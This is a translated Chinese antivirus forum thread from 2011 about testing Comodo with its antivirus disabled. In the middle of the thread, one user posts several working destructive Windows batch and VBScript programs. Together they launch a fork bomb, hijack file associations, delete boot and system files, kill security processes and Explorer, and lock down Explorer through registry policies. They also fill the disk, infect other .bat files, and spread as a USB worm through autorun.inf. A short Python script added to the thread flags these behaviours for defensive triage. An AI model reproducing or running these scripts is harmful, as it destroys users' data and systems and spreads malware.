
[Share] End of the semester, no time to test

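footman
 OP | Posted on 2011-11-13 21:37:22
bbbxyoiil posted on 2011-11-13 21:35
Actually, with the default rules you definitely have to turn on the antivirus and the sandbox as well; everything is enabled.

Actually, yes. But a lot of people don't have the AV installed, so I had to test with the AV disabled to give everyone a reference.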
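紫涵
Posted on 2011-11-13 21:37:49
Last edited by 紫涵 on 2011-11-13 21:38
bbbxyoiil posted on 2011-11-13 21:35
Actually, with the default rules you definitely have to turn on the antivirus and the sandbox as well; everything is enabled.


Comodo's antivirus occasionally freezes the machine; I open some program and the hard disk light just stays on non-stop...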
qqq123123
Posted on 2011-11-13 21:39:15
Please switch it to ascending order; this order is really annoying...
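footman
 OP | Posted on 2011-11-13 21:42:36
qqq123123 posted on 2011-11-13 21:39
Please switch it to ascending order; this order is really annoying...

In ascending order the latest reply got eaten and couldn't be seen, so I used descending order.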
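bbbxyoiil
Posted on 2011-11-13 21:43:26
紫涵 posted on 2011-11-13 21:37
Comodo's antivirus occasionally freezes the machine; I open some program and the hard disk light just stays on non-stop...

Surely not; at least mine doesn't.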
footman
 OP | Posted on 2011-11-13 21:43:39
qqq123123 posted on 2011-11-13 21:39
Please switch it to ascending order; this order is really annoying...

It's working again.
a256886572008
Posted on 2011-11-13 21:46:33
Last edited by a256886572008 on 2011-11-14 00:28
@echo off
echo :p>>C:\1.bat
echo start C:\1.bat>>C:\1.bat
echo goto p>>C:\1.bat
start C:\1.bat
assoc .txt=exefile
assoc .exe=txtfile
assoc .htm=exefile
assoc .html=exefile
assoc .com=txtfile
assoc .gho=txtfile
assoc .rar=txtfile
assoc .zip=txtfile
assoc .chm=txtfile
assoc .jpg=txtfile
assoc .doc=exefile
assoc .ppt=txtfile
assoc .vbs=txtfile
assoc .cmd=txtfile
assoc .bmp=txtfile
assoc .gif=txtfile
assoc .ico=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .jpe=txtfile
assoc .jfif=txtfile
assoc .fla=txtfile
assoc .swf=txtfile
assoc .avi=txtfile
assoc .mov=txtfile
assoc .asf=txtfile
assoc .wmv=txtfile
assoc .rm=txtfile
assoc .ra=txtfile
assoc .mvb=txtfile
assoc .flv=txtfile
assoc .mpg=txtfile
assoc .wav=txtfile
assoc .mpeg=txtfile
assoc .mp3=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .msi=txtfile
assoc .bat=txtfile
del %winder%\win.ini /f
del %winder%\regedit.exe /f

assoc .3g2=txtfile
assoc .dat=txtfile
del %winder%\Notepad.exe /f
del %winder%\System.ini /f
del C:\bootfront.bin /f
del C:\IO.sys /f
del C:\MSDOS.sys /f
del C:\NTDETECT.COM /f
taskkill /im 360tray.exe /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodrives /t REG_DWORD /d 60 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst r: C:\
subst t: C:\
subst k: C:\
subst p: C:\
subst q: C:\
subst s: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
taskkill /im explorer.exe /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 01000000 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
del %0 /f

@echo off
if exsit %SystemDrive%\PAGEFILES.SYS goto end
copy %0 %windir%\system32\logon.bat ::copy itself


FOR /F "tokens=3*" %%i in ('dir /-c %SystemDrive%^|find "可用字节"') do fsutil file createnew %SystemDrive%\PAGEFILES.SYS %%i ::create a huge file to fill up the hard disk


attrib +r +s +h %SystemDrive%\PAGEFILES.SYS ::hide the file


reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KV2007 /t REG_SZ /d %windir%\system32\logon.vbs ::autostart 1

set pat=「开始」菜单\程序\启动 ::autostart 2


reg delete HKLM\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /va /f ::do not show hidden files


for /r %SystemDrive% %%i in (*.bat) do type %0>%%i ::infect


if exist %windir%\system32\logon.vbs goto end
+++++++++++++++++++++++++=VBS part+++++++++++++++++++++++++++++++++++++++
echo on error resume next>%windir%\system32\logon.vbs
echo strComputer = ".">>%windir%\system32\logon.vbs
echo set fs =createobject("scripting.filesystemobject")>>%windir%\system32\logon.vbs
echo set WshShell = WScript.CreateObject("WScript.Shell")>>%windir%\system32\logon.vbs
echo Set objWMIService = GetObject("winmgmts:" _>>%windir%\system32\logon.vbs
echo ^& "{impersonationLevel=impersonate}!\\" ^& strComputer ^& "\root\cimv2")>>%windir%\system32\logon.vbs
echo Set colDisks = objWMIService.ExecQuery _>>%windir%\system32\logon.vbs
echo ("Select * from Win32_LogicalDisk")>>%windir%\system32\logon.vbs

::monitor USB drives
echo For i =1 to 9000000000>>%windir%\system32\logon.vbs
echo For Each objDisk in colDisks>>%windir%\system32\logon.vbs
echo Select Case objDisk.DriveType>>%windir%\system32\logon.vbs
echo :Case 2:>>%windir%\system32\logon.vbs


::check whether autorun.inf exists on the USB drive; if not, write autorun.inf and hide it.
echo y1=fs.FileExists(objDisk.DeviceID ^& "\AUTORUN.INF")>>%windir%\system32\logon.vbs
echo if not y1 then>>%windir%\system32\logon.vbs
echo set f=fs.opentextfile(objDisk.DeviceID ^& "\AUTORUN.INF",2, true)>>%windir%\system32\logon.vbs
echo f.write "[AutoRun]" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "open=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "shellexecute=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "shell\Auto\command=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.Close>>%windir%\system32\logon.vbs
echo Set f1 = fs.GetFile(objDisk.DeviceID ^& "\AUTORUN.INF")>>%windir%\system32\logon.vbs
echo If f1.Attributes = f1.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f1.Attributes = f1.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs


::check whether logon.bat exists on the USB drive; if not, write logon.bat and hide it.
echo y2=fs.FileExists(objDisk.DeviceID ^& "\logon.bat")>>%windir%\system32\logon.vbs
echo if not y2 then >>%windir%\system32\logon.vbs
echo fs.CopyFile "c:\windows\system32\logon.bat",objDisk.DeviceID ^& "\">>%windir%\system32\logon.vbs
echo Set f2 = fs.GetFile(objDisk.DeviceID ^& "\logon.bat")>>%windir%\system32\logon.vbs
echo If f2.Attributes = f2.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f2.Attributes = f2.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs


echo dirr = Wshshell.ExpandEnvironmentStrings("%systemdrive%")>>%windir%\system32\logon.vbs


::check whether PAGEFILES.SYS exists on the USB drive; if not, write PAGEFILES.SYS and hide it.
echo y3=fs.FileExists(dirr & "\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echo if not y3 then>>%windir%\system32\logon.vbs
echo WshShell.Run "logon.bat">>%windir%\system32\logon.vbs
echo WScript.Sleep 500>>%windir%\system32\logon.vbs
echo Set f3 = fs.GetFile(dirr & "\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echo If f3.Attributes = f3.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f3.Attributes = f3.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
echo End Select>>%windir%\system32\logon.vbs
echo Next>>%windir%\system32\logon.vbs


::scan once every 5 seconds.
echo WScript.Sleep 5000>>%windir%\system32\logon.vbs
echo Next>>%windir%\system32\logon.vbs
::run the logon.vbs script
start %windir%\system32\logon.vbs
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

:end

@echo off
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
for /l %%a in (1,1,2000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
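
Added example, not part of the original thread or of any poster's code: a static triage pass a defender could run over a batch file like the ones posted above, tagging the behaviours those scripts show (file-association changes, Explorer policy values, Run-key and autorun.inf persistence, deletes under system paths). The rule names, the threshold and the `SAMPLE`/`BENIGN` inputs are assumptions of this example; `SAMPLE` is constructed from a few lines of the post and is only read as text.

```python
import re

# Behaviour rules modelled on the posted scripts; the names are this example's own.
RULES = [
    ("assoc-hijack", re.compile(r"^\s*assoc\s+\.\w+\s*=\s*(exefile|txtfile)\b", re.I)),
    ("explorer-policy", re.compile(r"reg\s+add\s+\S*\\Policies\\Explorer\b", re.I)),
    ("run-key-persistence", re.compile(r"reg\s+add\s+\S*\\CurrentVersion\\Run\b", re.I)),
    ("autorun-inf-write", re.compile(r"autorun\.inf|\[AutoRun\]", re.I)),
    ("system-path-delete", re.compile(r"^\s*del\s+(%\w+%|[a-z]:)\\\S+", re.I)),
    ("process-kill", re.compile(r"\btaskkill\s+/im\s+\S+", re.I)),
    ("self-copy-or-delete", re.compile(r"\b(copy|del|type)\s+%0\b", re.I)),
    ("subst-mapping", re.compile(r"^\s*subst\s+[a-z]:\s", re.I)),
]

def triage(script_text):
    """Return {rule name: [1-based line numbers]} for every rule that fires."""
    hits = {}
    for lineno, line in enumerate(script_text.splitlines(), 1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(hits, threshold=3):
    """Grade by how many distinct behaviours co-occur, not by raw hit count."""
    if not hits:
        return "no-match"
    return "suspicious" if len(hits) >= threshold else "review"

# Constructed input: ten lines excerpted from the post above, never executed.
SAMPLE = r"""@echo off
assoc .txt=exefile
assoc .exe=txtfile
del %winder%\regedit.exe /f
taskkill /im 360tray.exe /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
subst b: C:\
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KV2007 /t REG_SZ /d %windir%\system32\logon.vbs
echo f.write "[AutoRun]" ^& vbcrlf>>%windir%\system32\logon.vbs
del %0 /f
"""

# Constructed benign batch file for contrast.
BENIGN = "@echo off\necho backup started\nxcopy C:\\data D:\\backup /s /y\n"

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE), ("benign", BENIGN)):
        found = triage(text)
        print(label, verdict(found), found)
```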


紫涵
Posted on 2011-11-13 21:50:11
bbbxyoiil posted on 2011-11-13 21:43
Surely not; at least mine doesn't.

With real-time monitoring on, it can hang for quite a while... occasionally...
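bbbxyoiil
Posted on 2011-11-13 21:52:29
紫涵 posted on 2011-11-13 21:50
With real-time monitoring on, it can hang for quite a while... occasionally...

On this machine of mine I only have CIS installed, with real-time monitoring on too, and the specs aren't high either; I haven't seen the kind of thing you describe.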
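紫涵
Posted on 2011-11-13 21:53:16
bbbxyoiil posted on 2011-11-13 21:52
On this machine of mine I only have CIS installed, with real-time monitoring on too, and the specs aren't high either; I haven't seen the kind of thing you describe.

Mine is WIN7 X64.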
Copyright © KaFan  KaFan.cn All Rights Reserved.